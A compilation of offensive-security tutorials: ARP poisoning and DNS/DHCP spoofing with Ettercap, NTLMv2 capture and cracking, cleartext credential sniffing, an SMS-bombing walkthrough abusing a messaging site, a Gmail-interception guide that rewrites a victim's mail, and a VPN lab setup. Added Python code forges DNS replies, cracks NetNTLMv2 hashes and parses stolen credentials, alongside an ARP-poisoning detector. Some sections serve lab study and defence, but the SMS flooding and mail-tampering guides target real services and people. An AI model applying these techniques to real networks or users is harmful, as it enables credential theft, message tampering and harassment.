Comprehensive Guide on Sniffing

ARP Protocol

The Address Resolution Protocol (ARP) is a communication protocol. It is used for discovering the link layer address associated with a given Internet layer address, a critical function in the Internet protocol suite. ARP was defined by RFC 826 in 1982 and is Internet Standard STD 37. ARP is also the name of the program for manipulating these addresses in most operating systems.

ARP maps a network-layer address (for example an IPv4 address) to a link-layer address such as a MAC address; RFC 826 has the full specification.

Requirements:

  1. Kali Linux machine
  2. Windows machine
  3. Local area network
  4. Ettercap
  5. VM running Metasploitable
  6. Wireshark (protocol analyzer)
  7. XArp
  8. FTP client
  9. PuTTY client

ARP Protocol Process

Address Resolution Protocol works much like the Domain Name System (DNS). Where DNS resolves a known domain name to an IP address you do not yet have, ARP resolves a known IP address to a MAC address you do not yet have, as shown in the image below.

In the image above, 192.168.1.102 wants to communicate with 192.168.1.101 but does not know its physical (MAC) address. It broadcasts an ARP request to every host on the segment, including X.X.X.100, X.X.X.101 and X.X.X.103. When X.X.X.101 receives the request it answers with a unicast ARP reply carrying its MAC address, BB-BB-BB-BB-BB-BB. The requester stores that IP-to-MAC mapping in its ARP cache for a short time so that it does not have to repeat the exchange for every packet, which keeps ARP traffic on the network low. Each cache entry holds the IP address, the MAC address and a timer; the timer's duration depends on the operating system (for example, a Windows host may hold an entry for about 2 minutes while a Linux host may keep it for around 15 minutes). Nothing in this exchange is authenticated: any host can send a reply for any IP address, and that is exactly what the rest of this article exploits.

Let us now exploit the ARP protocol to our advantage.

Scenario: we use two Windows hosts, Host A and Host B, as the victims and a Kali Linux machine, Host C, as the attacker. In the image below the attacker has launched an ARP poisoning attack, and the victims' ARP tables now pair the attacker's MAC address with the IP addresses of both Host A and Host B.

Let’s Begin the ARP Poisoning Attack

The first step is to record the correct, unpoisoned mappings. On Host B, open a command prompt and clear the ARP cache with arp -d (on current Windows versions this needs an elevated prompt), ping Host A so that a fresh ARP exchange takes place, then run arp -a; the entry for Host A now shows Host A's real physical (MAC) address.

Repeat the same steps on Host A to record the real MAC address of Host B.

Start Sniffing with Ettercap

Now exploit Host A and Host B from Host C, our Kali Linux machine. Start Ettercap on Kali as shown in the image below.

Go to Sniff and select Unified sniffing.

Select the appropriate network interface (eth0 in this case) and click OK.

Go to the Hosts tab and select Scan for hosts to enumerate the systems on the local network.

The host list shows every system found by the scan. Select the targets, X.X.X.101 and X.X.X.102, and add them one at a time with Add to Target 1 and Add to Target 2 respectively; the image shows both targets added.

Go to Mitm (Man in the middle) and select ARP poisoning. A dialog box with optional parameters appears.

Check "Sniff remote connections" and click OK.

Go to the Start tab and click Start sniffing to begin intercepting Host A and Host B.

Now open a terminal on the Kali machine and run ifconfig to find its IP and physical (MAC) address; in our case the MAC is 00:0c:29:5b:8e:18, as highlighted in the image.

With the ARP poisoning attack running against X.X.X.101 and X.X.X.102, run arp -a on either victim. The cached MAC address of the other victim has changed to the MAC address of the Kali machine: in the image, X.X.X.102 and X.X.X.107 (Kali) now show the same physical address, so everything Host A sends to X.X.X.102 is actually delivered to the Kali machine at X.X.X.107, which forwards it on.

Demonstrate MITM with Wireshark

Now open Wireshark on the Kali machine and apply the display filter icmp && (eth.src == 00:0c:29:5b:8e:18 || eth.dst == 00:0c:29:5b:8e:18). Here eth.src is the Ethernet source address and eth.dst the Ethernet destination address, and both are set to the MAC address of our Kali machine. The result shows ICMP packets with source IP X.X.X.102 and destination IP X.X.X.101 carried in frames whose source or destination MAC is 00:0c:29:5b:8e:18: every ping between the two victims passes through the Kali machine, which proves that their traffic is being sniffed.

Combining DNS Spoofing with sniffing

Let us now exploit both victim machines with a DNS spoofing attack.

On the Kali machine open /etc/ettercap/etter.dns, add the line * A <your Kali Linux IP address> as shown below, and save the file. The wildcard means that every A-record query the victims make will be answered with the Kali address.

Next, in Ettercap, go to Plugins and click Manage the plugins as shown below:

Select the dns_spoof plug-in; once it is active an asterisk (*) appears next to its name.

Now, if we run ping www.google.com on a victim machine, the replies come from X.X.X.107, the IP of our Kali machine. Ettercap has not become the victim's DNS server: it sees the victim's DNS query on the poisoned path and answers it first with a forged reply pointing at the Kali address, which the victim's resolver accepts.
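The forged reply dns_spoof sends, shown as an added Python example that is not part of the original article or of Ettercap's code. It reads etter.dns-style A rules, parses a victim's DNS query, and builds an answer that copies the query's transaction ID and question so the resolver accepts it. The rule set, the queried name and the 192.168.0.107 attacker address are constructed for the demo (the article's real line is * A followed by the Kali IP), and the packets are only built in memory, never sent.

```python
"""Added example: etter.dns wildcard rules and the forged DNS reply that
dns_spoof would send. All data below is constructed; nothing is sent."""
import fnmatch
import struct

# Constructed rule set in etter.dns syntax ("<name or glob> A <ip>").
# The article's actual line is "* A <Kali IP>"; .107 is assumed here.
ETTER_DNS_RULES = """
# comment lines and blanks are ignored
*   A   192.168.0.107
"""


def parse_etter_dns(text):
    """Return [(pattern, ip)] for the A-record lines of an etter.dns file."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        parts = line.split()
        if len(parts) == 3 and parts[1].upper() == "A":
            rules.append((parts[0].lower(), parts[2]))
    return rules


def match_rule(name, rules):
    """IP of the first rule whose glob matches the queried name, else None."""
    for pattern, ip in rules:
        if fnmatch.fnmatchcase(name.lower(), pattern):
            return ip
    return None


def build_query(txid, name, qtype=1):
    """Plain DNS query (RD set) for `name`; qtype 1 = A, 28 = AAAA."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)


def parse_question(packet):
    """Return (txid, name, qtype, offset just past the first question)."""
    txid, _flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount < 1:
        raise ValueError("no question section")
    labels, pos = [], 12
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        labels.append(packet[pos:pos + length].decode())
        pos += length
    qtype, _qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return txid, ".".join(labels), qtype, pos + 4


def forge_response(query, rules, ttl=60):
    """The reply dns_spoof races against the real server: same txid, same
    question, one A record with the rule's IP. Returns None when no rule
    matches or the query is not for an A record (the real reply then stands)."""
    txid, name, qtype, qend = parse_question(query)
    ip = match_rule(name, rules) if qtype == 1 else None
    if ip is None:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA
    question = query[12:qend]
    # name = pointer 0xC00C to the question name; type A, class IN, ttl, len 4
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + bytes(int(o) for o in ip.split("."))
    return header + question + answer


def parse_answer_ip(response):
    """IPv4 address from the first A record of a reply built as above."""
    _txid, _flags, _qd, ancount = struct.unpack("!HHHH", response[:8])
    if ancount < 1:
        return None
    _, _, _, qend = parse_question(response)
    rdlength = struct.unpack("!H", response[qend + 10:qend + 12])[0]
    return ".".join(str(b) for b in response[qend + 12:qend + 12 + rdlength])


if __name__ == "__main__":
    rules = parse_etter_dns(ETTER_DNS_RULES)
    query = build_query(0x1A2B, "www.google.com")   # what the victim sends
    reply = forge_response(query, rules)             # what dns_spoof answers
    print(parse_answer_ip(reply))                    # 192.168.0.107
```

Only the transaction ID and the question have to match for a stub resolver to accept the first reply it sees, which is why sitting on the victim's path (the ARP poisoning above) is enough: the forged answer simply arrives before the real one.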

Let us now add one more plug-in in the same way as dns_spoof, this time remote_browser, as shown in the image below. This plug-in replays the URLs the victim requests over HTTP into the attacker's browser, so you can follow the victim's browsing; user names and passwords sent over cleartext protocols are printed by Ettercap's own dissectors rather than by this plug-in.

Capturing NTLM passwords

Open a Kali terminal and type msfconsole. Once the console starts, type search http_ntlm, then use auxiliary/server/capture/http_ntlm as shown in the image below:

This module attempts to quietly catch NTLM/LM challenge hashes.

With the DNS spoofing trap above in place, every HTTP web site the victim opens is redirected to the attacker's IP, where this module answers with an NTLM authentication challenge and captures the victim's response.

In the image below the victim tries to browse IMDb.com and is met with an authentication prompt asking for a user name and password. Any other site, say google.com, produces the same prompt; until the victim submits credentials he cannot browse anything.

As soon as the victim enters a user name and password, the attacker captures the NTLM hash in the background.

Great! The attacker has captured an NTLMv2 hash; let us look at what else was captured along with the hash value.

From the given image you can see that the attacker has captured two things more:

  • Username: raj
  • Machine name: WIN-1GKSSJ7D2AE

Now use John the Ripper to crack the NTLMv2 hash with the command shown below.

The image below confirms that we cracked the captured hash: user name raj, password 123. Note that what was captured is a challenge-response (NetNTLMv2), not a reusable password hash, so it has to be cracked (or relayed) rather than passed.
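What the cracking step above actually checks, as an added Python example that is not part of the original article or of John the Ripper: it computes the NetNTLMv2 proof from a candidate password, the captured user name and domain, the server challenge and the client blob, and tries a word list against a captured line in John's netntlmv2 format. Because the article's capture is only shown as an image, the server challenge and client blob below are constructed; the user raj, the domain WIN-1GKSSJ7D2AE and the password 123 are the article's. MD4 is implemented inline because OpenSSL 3 builds of Python often refuse hashlib.new('md4') as a legacy algorithm.

```python
"""Added example: verify/crack a captured NetNTLMv2 response. The challenge
and blob are constructed; user, domain and password follow the article."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


# (round function, additive constant, shift table, message-word order), RFC 1320
_MD4_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19),
     list(range(16))),
    (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
     [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
    (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
     [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
)


def md4(data):
    """Pure-Python MD4 (RFC 1320), needed for the NT hash."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for func, const, shifts, order in _MD4_ROUNDS:
            for i in range(16):
                t = (-i) % 4                      # updates a, d, c, b, a, d, ...
                x, y, z = v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]
                v[t] = _rotl((v[t] + func(x, y, z) + words[order[i]] + const) & MASK,
                             shifts[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password, user, domain, server_challenge, blob):
    """NTProofStr = HMAC-MD5(HMAC-MD5(NT(pw), upper(user)+domain), challenge+blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"),
                   hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def make_blob(client_challenge, target_name):
    """A minimal NTLMv2 client blob (constructed; timestamp zeroed)."""
    target = target_name.encode("utf-16-le")
    av_pairs = struct.pack("<HH", 2, len(target)) + target + struct.pack("<HH", 0, 0)
    return (b"\x01\x01\x00\x00" + b"\x00" * 4 + b"\x00" * 8 + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)


def john_line(user, domain, server_challenge, proof, blob):
    """The netntlmv2 line format that capture modules hand to John/hashcat."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_john_line(line, wordlist):
    """Recompute the proof for each candidate; the one that matches is the password."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    chal, proof, blob = (bytes.fromhex(h) for h in (chal_hex, proof_hex, blob_hex))
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


def demo_capture_line():
    """Simulate the http_ntlm capture of raj / WIN-1GKSSJ7D2AE / 123 with a
    constructed 8-byte server challenge and client challenge."""
    server_challenge = bytes.fromhex("1122334455667788")   # constructed
    blob = make_blob(bytes.fromhex("aabbccddeeff0011"), "WIN-1GKSSJ7D2AE")
    proof = ntlmv2_proof("123", "raj", "WIN-1GKSSJ7D2AE", server_challenge, blob)
    return john_line("raj", "WIN-1GKSSJ7D2AE", server_challenge, proof, blob)


if __name__ == "__main__":
    line = demo_capture_line()
    print(crack_john_line(line, ["password", "admin", "123", "letmein"]))  # 123
```

The proof is keyed by the user name and domain as well as the password, which is why the capture module has to record those two values alongside the hash; without them no candidate password can be checked.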

Combining DHCP Spoofing with sniffing

DHCP spoofing: the attacker runs a rogue DHCP server on the local network. It answers clients' DHCP Discover/Request messages with Offer/Ack replies carrying false configuration, typically the attacker's address as default gateway and DNS server, so that the clients' traffic is routed through the attacker.

Go to Ettercap, click Mitm and select DHCP spoofing.

In the dialog shown below, provide the following information:

  • IP Pool: 192.168.0.200-210 (the range of addresses the rogue server hands out to systems joining the network)
  • Netmask: 255.255.255.0 (matching the network)
  • DNS Server IP: 192.168.0.1 (matching the network)

Click OK and start sniffing.

Here the Metasploitable server has been started; the image below shows that it received 192.168.0.202, an address from the pool configured in Ettercap's DHCP spoofing dialog.

Now go to the client machine and connect to the Metasploitable server with an FTP client, as shown in the image below.

Provide the host name (IP address), user name and password to connect to the FTP server.

The image below shows that the FTP user name and password sent by the client, User: msfadmin, Pass: msfadmin, are captured by Ettercap, because FTP transmits them in cleartext.

Next, connect to the Metasploitable server (192.168.0.202) over Telnet on port 23 using PuTTY, as shown below; it prompts for a user name and password, so provide them.

The image above shows that Ettercap also captured the Telnet credentials entered by the user, in our case User: msfadmin, Pass: msfadmin.

HTTP Password Sniffing

Let us now do the same with HTTP (Hypertext Transfer Protocol).

The image below shows DVWA running on our Metasploitable server. From the client browser, open 192.168.0.202/dvwa/login.php; it prompts for a user name and password, so provide the credentials.

As the image below shows, Ettercap once again captured the user name and password submitted from the browser, username: admin, password: password, because the DVWA login form is posted over plain HTTP.

SMTP Password Sniffing

Lastly, let us try SMTP (Simple Mail Transfer Protocol) sniffing.

The first step is to configure an SMTP server in your environment; see the separate article on configuring an SMTP server on a Windows machine.

Once the server is configured and e-mail clients are set up on the target machines, open Ettercap, add both targets, X.X.X.102 and X.X.X.104, and select ARP poisoning as before.

Now send an e-mail from Target A to Target B as shown below.

Target A (Raj) is the sender and Target B (Aarti) the recipient, so the SMTP service on port 25 comes into play.

The image below confirms that Aarti received Raj's mail, while in the background the attacker sniffs all the traffic that now passes through the Kali machine on its way between the targets and the mail server.

In the Ettercap console we can clearly see that it sniffed the traffic between Target A and Target B and captured the SMTP credentials of Target A (Raj), as shown in the image above.

Capture Email of SMTP server with Wireshark

In Wireshark apply the filter smtp && (eth.src == 00:0c:29:4a:47:75 || eth.dst == 00:0c:29:4a:47:75); the MAC address is that of our Kali machine. You will see that it captured packets from both target machines.

It sniffed every SMTP packet and captured both e-mail addresses, sender and receiver, together with the message sent to Target B, "Hello Friends today we are performing SMTP sniffing", which shows that the attack on the selected targets succeeded, as shown in the image below.
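The password dissection Ettercap performed in the FTP, Telnet, HTTP and SMTP steps above, as an added Python example (not Ettercap's code and not part of the original article). It runs the same kind of pattern matching over constructed client-to-server payloads modelled on the article's lab, so it works offline: the host 192.168.0.202 and the credentials msfadmin, admin/password and raj/123 come from the article, while the lab.local domain, the Telnet banner and the request paths are made up for the sample.

```python
"""Added example: credential dissection for the cleartext protocols sniffed
above (FTP, Telnet, HTTP, SMTP) over constructed payloads, not live traffic."""
import base64
import re
from urllib.parse import parse_qs

# Constructed client-to-server streams modelled on the article's lab.
SAMPLES = {
    "ftp": "USER msfadmin\r\nPASS msfadmin\r\nSYST\r\n",
    "smtp_login": ("EHLO client\r\nAUTH LOGIN\r\n"
                   + base64.b64encode(b"raj").decode() + "\r\n"
                   + base64.b64encode(b"123").decode() + "\r\n"
                   + "MAIL FROM:<raj@lab.local>\r\n"),
    "smtp_plain": "AUTH PLAIN " + base64.b64encode(b"\x00raj\x00123").decode() + "\r\n",
    "http_basic": ("GET /secret HTTP/1.1\r\nHost: 192.168.0.202\r\n"
                   "Authorization: Basic " + base64.b64encode(b"admin:password").decode()
                   + "\r\n\r\n"),
    "http_form": ("POST /dvwa/login.php HTTP/1.1\r\nHost: 192.168.0.202\r\n"
                  "Content-Type: application/x-www-form-urlencoded\r\n"
                  "Content-Length: 44\r\n\r\n"
                  "username=admin&password=password&Login=Login"),
}

# Telnet is interactive, so the sample keeps both directions: ("s", server)
# and ("c", client). Real clients send one keystroke per segment; a sniffer
# reassembles them into lines first, which is assumed already done here.
TELNET_TURNS = [
    ("s", "Ubuntu 8.04\r\nmetasploitable login: "),
    ("c", "msfadmin\r\n"),
    ("s", "Password: "),
    ("c", "msfadmin\r\n"),
    ("s", "Last login: Fri Jan  5 10:00:00 UTC 2024\r\nmsfadmin@metasploitable:~$ "),
]


def ftp_creds(stream):
    """FTP sends USER and PASS as plain command lines."""
    user = re.search(r"^USER (\S+)", stream, re.M)
    pw = re.search(r"^PASS (\S+)", stream, re.M)
    return (user.group(1), pw.group(1)) if user and pw else None


def smtp_creds(stream):
    """AUTH PLAIN carries \\0user\\0pass in one base64 token; AUTH LOGIN sends
    user and password as two separate base64 lines."""
    m = re.search(r"^AUTH PLAIN (\S+)", stream, re.M | re.I)
    if m:
        _authzid, user, pw = base64.b64decode(m.group(1)).split(b"\x00")
        return user.decode(), pw.decode()
    m = re.search(r"^AUTH LOGIN\r\n(\S+)\r\n(\S+)\r\n", stream, re.M | re.I)
    if m:
        return tuple(base64.b64decode(g).decode() for g in m.groups())
    return None


def http_creds(stream):
    """Basic auth header, or a form POST with the usual field names."""
    m = re.search(r"^Authorization: Basic (\S+)", stream, re.M | re.I)
    if m:
        user, _, pw = base64.b64decode(m.group(1)).decode().partition(":")
        return user, pw
    head, _, body = stream.partition("\r\n\r\n")
    if head.startswith("POST") and "application/x-www-form-urlencoded" in head:
        form = parse_qs(body)
        user = next((form[k][0] for k in ("username", "user", "login", "email") if k in form), None)
        pw = next((form[k][0] for k in ("password", "pass", "passwd") if k in form), None)
        if user and pw:
            return user, pw
    return None


def telnet_creds(turns):
    """Pair each 'login:' / 'Password:' prompt with the next client line."""
    user = pw = expect = None
    for direction, text in turns:
        if direction == "s":
            if re.search(r"login:\s*$", text, re.I):
                expect = "user"
            elif re.search(r"password:\s*$", text, re.I):
                expect = "pass"
        elif expect:
            if expect == "user":
                user = text.strip()
            else:
                pw = text.strip()
            expect = None
    return (user, pw) if user and pw else None


def dissect_all():
    """Run every dissector over the samples, like Ettercap's console output."""
    found = {name: (smtp_creds if name.startswith("smtp") else
                    http_creds if name.startswith("http") else ftp_creds)(stream)
             for name, stream in SAMPLES.items()}
    found["telnet"] = telnet_creds(TELNET_TURNS)
    return found


if __name__ == "__main__":
    for proto, creds in dissect_all().items():
        print(f"{proto:12s} USER: {creds[0]}  PASS: {creds[1]}")
```

None of these protocols hides the secret in any way: base64 in HTTP Basic and SMTP AUTH is an encoding, not encryption, so once the traffic is on the attacker's path the credentials are a regular expression away. The fix is transport protection (SFTP/FTPS, SSH instead of Telnet, HTTPS, SMTP with STARTTLS or implicit TLS), not a stronger password.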

Throughout this article we discussed techniques that exploit the ARP protocol; let us now briefly discuss how to detect an ARP attack.

ARP Attack Detection                

Various tools can detect ARP attacks; one of the most common is XArp, which we use here.

XArp can run on any host in the network. The image above highlights the affected systems in red (X). Those hosts can be disconnected from the network while deciding on the next course of action; the lasting mitigations are switch-side controls:

  1. Dynamic ARP Inspection (DAI), which drops ARP replies that do not match the DHCP snooping binding table
  2. DHCP snooping, which blocks rogue DHCP servers on untrusted ports and builds the binding table that DAI relies on
  3. VLAN hopping prevention (disable DTP negotiation on access ports and use an unused native VLAN on trunks), so that an attacker cannot reach segments other than his own
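Host-side detection of the symptom shown earlier, where arp -a on a victim listed two IP addresses with the same MAC, as an added Python example that is not part of the original article and is not XArp's code. It parses the text output of arp -a (Windows) or ip neigh (Linux), flags any MAC that backs more than one IP, and compares the gateway's cached MAC with a baseline recorded on a clean network. The cache dumps are constructed sample output modelled on the article's lab (Kali at .107 with the article's MAC 00:0c:29:5b:8e:18); the gateway MAC and the 192.168.1.x addresses are assumptions.

```python
"""Added example: detect ARP poisoning from a host's own ARP cache dump.
The dumps below are constructed sample output, not real captures."""
import re
from collections import defaultdict

WINDOWS_ARP_A = """
Interface: 192.168.1.101 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-aa-aa-aa-aa-aa     dynamic
  192.168.1.102         00-0c-29-5b-8e-18     dynamic
  192.168.1.107         00-0c-29-5b-8e-18     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

LINUX_IP_NEIGH = """
192.168.1.1 dev eth0 lladdr aa:aa:aa:aa:aa:aa REACHABLE
192.168.1.102 dev eth0 lladdr 00:0c:29:5b:8e:18 STALE
192.168.1.107 dev eth0 lladdr 00:0c:29:5b:8e:18 REACHABLE
"""

# An IPv4 address at the start of a line followed, later on the same line,
# by a MAC in either dash or colon notation.
ENTRY_RE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s.*?([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})", re.I | re.M)


def parse_arp_table(text):
    """Return {ip: mac} with MACs normalised to lower-case colon form.
    Broadcast and multicast entries are skipped: they legitimately share
    MACs and would otherwise produce false positives."""
    table = {}
    for ip, mac in ENTRY_RE.findall(text):
        mac = mac.lower().replace("-", ":")
        first_octet = int(ip.split(".")[0])
        if mac == "ff:ff:ff:ff:ff:ff" or mac.startswith("01:00:5e") or 224 <= first_octet <= 239:
            continue
        table[ip] = mac
    return table


def duplicate_macs(table):
    """{mac: [ips]} for every MAC that backs more than one IP address.
    On a healthy segment this is empty; after poisoning the attacker's MAC
    shows up under its own IP and under every spoofed one."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_changed(table, gateway_ip, known_mac):
    """True when the gateway's cached MAC differs from the baseline recorded
    on a clean network: the classic sign of a man in the middle."""
    current = table.get(gateway_ip)
    return current is not None and current != known_mac.lower()


def alerts(text, gateway_ip=None, known_gateway_mac=None):
    """Human-readable findings for one cache dump."""
    table = parse_arp_table(text)
    out = [f"{mac} claims {', '.join(ips)}" for mac, ips in duplicate_macs(table).items()]
    if gateway_ip and known_gateway_mac and gateway_changed(table, gateway_ip, known_gateway_mac):
        out.append(f"gateway {gateway_ip} now maps to {table[gateway_ip]} "
                   f"(expected {known_gateway_mac})")
    return out


if __name__ == "__main__":
    for name, dump in (("windows", WINDOWS_ARP_A), ("linux", LINUX_IP_NEIGH)):
        for finding in alerts(dump, "192.168.1.1", "aa:aa:aa:aa:aa:aa"):
            print(f"[{name}] {finding}")
```

The duplicate-MAC check is cheap but only fires once the poisoning has already landed in the cache; the gateway baseline check is what catches the common single-target case where the attacker impersonates only the router. Both are host-local and reactive, which is why the switch-side controls listed above remain the real fix.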

Author: Krishnan Sharma is a technology professional with a passion for information security and related fields. He loves technical writing and is part of the Hacking Articles team.

SMS Bombing on Mobile using Burpsuite

In this article we will learn about SMS bombing: sending someone hundreds or thousands of SMS messages at once. There are many third-party sites that claim to do this, but they are usually useless. We introduce a different method, and all you need is Kali.

We are going to use Burp Suite, which means we have to set up the browser proxy first. Go to the browser settings and select Preferences.

Then select Advanced and go to Network Settings.

A dialog box opens; select Manual proxy configuration. Set the HTTP proxy to localhost or 127.0.0.1 (the two are equivalent), with the port Burp listens on (8080 by default).

Now that the proxy is set up, open Burp Suite.

Select the Proxy tab, then the Options tab, and tick the checkbox for the listener interface. Then click the Edit button on the left.

A dialog box opens; select the Support invisible proxying option and click OK.

Back in the previous window, make sure the Invisible box is ticked too.

All settings are now done. Next we need to send a message, so log in to way2sms.com.

After logging in, write the message and enter the number to which you want to send it. Before clicking Send, turn on interception in Burp Suite.

When you click Send, the request goes to Burp Suite first, since it is capturing the traffic. Once the request is captured, right-click anywhere in it and select Send to Intruder, or use the keyboard shortcut Ctrl+I.

In the Intruder tab select the Positions tab. It shows the details of the request, that is, the number the SMS was addressed to and the text of the message.

Select part of the message text and click Add to mark it as a payload position.

Now go to the Payloads tab and select Brute forcer as the payload type.

Set the character set to 123456789 (the digits 1 to 9), a minimum length of 1 and a maximum length of 3. Minimum and maximum length are the number of characters in each payload generated from the character set. With nine characters and lengths 1 to 3 this produces 9 + 81 + 729 = 819 distinct payloads, and therefore 819 messages to the receiver.

Finally, to start the attack, go to the Intruder menu and select Start attack.

Once the attack starts, the receiver gets the messages at intervals of 1 to 5 seconds, as shown in the image below:

I stopped the attack after 29 messages, which were sent over a span of 1 to 2 minutes.

Author: Shivam Gupta is an ethical hacker, cyber security expert and penetration tester from India.

Hijacking Gmail Message on Air using Burpsuite

Burp Suite supports several powerful attacks that you may not know of; in this article we try one of them. We will learn how to get between a Gmail user and the network and change the text of a mail before it reaches the recipient.

First of all, open a terminal in Kali and type the following command:

Here,

-i –> interface

wlan0 –> the network interface to use (Ethernet or WLAN, depending on how you reach the victim; if the victim is on eth0, use eth0)

-t –> target

192.168.100.4 –> victim IP

192.168.100.1 –> the gateway (which here also acts as the DNS server)

Running the command above sends forged ARP replies to the victim so that the packets it sends to the router are delivered to us instead. We also need the opposite direction, so open another terminal in Kali and type the following command, which does the same for the packets the router sends to the victim.

Here,

-i –> interface

wlan0 –> network interface

-t –> target

192.168.100.1 –> the gateway (DNS)

192.168.100.4 –> victim IP

This second command redirects the packets the router sends to the victim IP. Now type the following command to enable IP forwarding on our machine; without it the victim's traffic would be dropped instead of relayed and the connection would visibly break.

Then type the following command so that all packets for port 80 are redirected to our machine, on the port Burp listens on.

Then type the following command so that all packets for port 443 are redirected in the same way.

Once this is done, open Burp Suite, go to the Proxy tab and select the Options tab. Click the Add button.

Clicking Add opens the following dialog. Enter port 80 in the "Bind to port" box and select your IP under "Specific address".

Next, select the Request handling tab, tick Support invisible proxying and click OK.

Repeat the above steps for port 443.

After clicking OK, make sure the Running and Invisible boxes are ticked for both listeners.

When the victim signs in to his or her Gmail account, the data is captured in Burp Suite. Because Gmail is served over HTTPS, this only works if the victim's browser accepts Burp's certificate (for example because Burp's CA certificate was installed on the victim machine beforehand); otherwise the browser shows a certificate warning or, for HSTS-protected hosts, refuses the connection outright.

The captured data contains the victim's user name and password, as shown below.

Here is a closer view of the user name and password.

The victim types and sends the message without suspicion:

When the victim clicks Send, the mail reaches us before it reaches its destination.

Now you can change the text of the message by clicking in the message area and typing your own, as I changed HELLO THIS IS TESTING to YOU HAVE BEEN HACKED.

Once you have changed the message, click the Forward button at the top left and the mail goes on to its destination, as shown below:

Author: Shivam Gupta is an ethical hacker, cyber security expert and penetration tester from India.

Setup VPN Penetration Testing Lab in Server 2008

You just need to follow the basic steps for configuring a remote access virtual private network (VPN) server using Server Manager, the Add Roles Wizard and the Routing and Remote Access Server Setup Wizard. After you finish configuring a basic remote access VPN server, you can perform additional configuration on the client depending on how you want to use the server.

Start -> Administrative Tools -> Server Manager. Click Add Roles.

This wizard helps you install roles on your server; click Next to continue.

Select the "Network Policy and Access Services" role and click Next.

Read the introduction and click Next to continue.

On the Select Role Services screen for Network Policy and Access Services, tick Routing and Remote Access Services and make sure Remote Access Service and Routing are both selected. Click Next to continue.

To install the listed role services for Network Policy and Access Services, click Install.

The summary shows that Remote Access Service and Routing were installed successfully. Once the installation finishes, click Close to end the wizard.

This completes the installation of the VPN role on the server.

To complete the configuration in Routing and Remote Access, follow these steps.

Start -> Administrative Tools ->Routing and Remote Access

In the console that opens, right-click your server name and choose "Configure and Enable Routing and Remote Access"; this configures Routing and Remote Access on the selected server.

The wizard lets you enable any of the listed combinations of services. I choose Custom configuration for my server and click Next.

The Routing and Remote Access Server Setup Wizard now asks which type of access clients should have to the server's network.

You can configure the selected services in the Routing and Remote Access console. I tick VPN access and click Next to continue.

You have now completed the setup of the VPN access service on the server; click Finish to close the wizard.

A dialog box reports that the Routing and Remote Access service is ready to use, so click Start service.

Once the process finishes and you are back on the main Server Manager window, Routing and Remote Access should be up and running.

After Routing and Remote Access is configured, the administrator selects the desired users and grants them the privilege to connect to the server over VPN from other locations.

Start -> Administrative Tools -> Active Directory Users and Computers -> right-click a user and open Properties

Click the Dial-in tab and under Network Access Permission select Allow access. Click Apply and OK to finish. Only users granted this permission can connect to the server network over VPN from another network.

This was the first phase of the VPN configuration, performed on the server side by the administrator.

SETUP VPN CONNECTION FOR CLIENT ON WINDOWS 7

Setting up a client connection to a VPN is very similar to setting up an old-fashioned dial-up connection over a phone line. You enter a server address (host name or IP), a user name and a password. Once connected, the system receives an IP address within the VPN network, so it can be reached from any other machine connected to the same VPN.

Click Start -> Control Panel -> Network and Internet -> Network and Sharing Center

Under Change your network settings, click Set up a new connection or network; this offers the different connection types: broadband, dial-up, VPN, or setting up a router or access point.

Of the options offered, I choose Connect to a workplace, which sets up a dial-up or VPN connection to your workplace, in our case the server.

The Connect to a Workplace wizard then asks how you want to connect to your workplace or server.

My option is Use my Internet connection (VPN), so the connection is established over the Internet.

To connect you must know the IP address of the workplace or server. 192.168.0.106 is the IP of my Windows Server 2008 R2 with the VPN set up and configured, so I enter it as the Internet address for the connection.

Earlier I granted the user pentest the Allow access permission for VPN connections. When you try to connect, you are asked for credentials: the client enters that user name and password and clicks Connect.

When the credentials are accepted, the client is connected to the workplace over the VPN.

This gives the client and server a private tunnel over the Internet for sharing data; how secure it actually is depends on the tunnelling protocol and authentication method negotiated, and PPTP in particular is no longer considered secure.
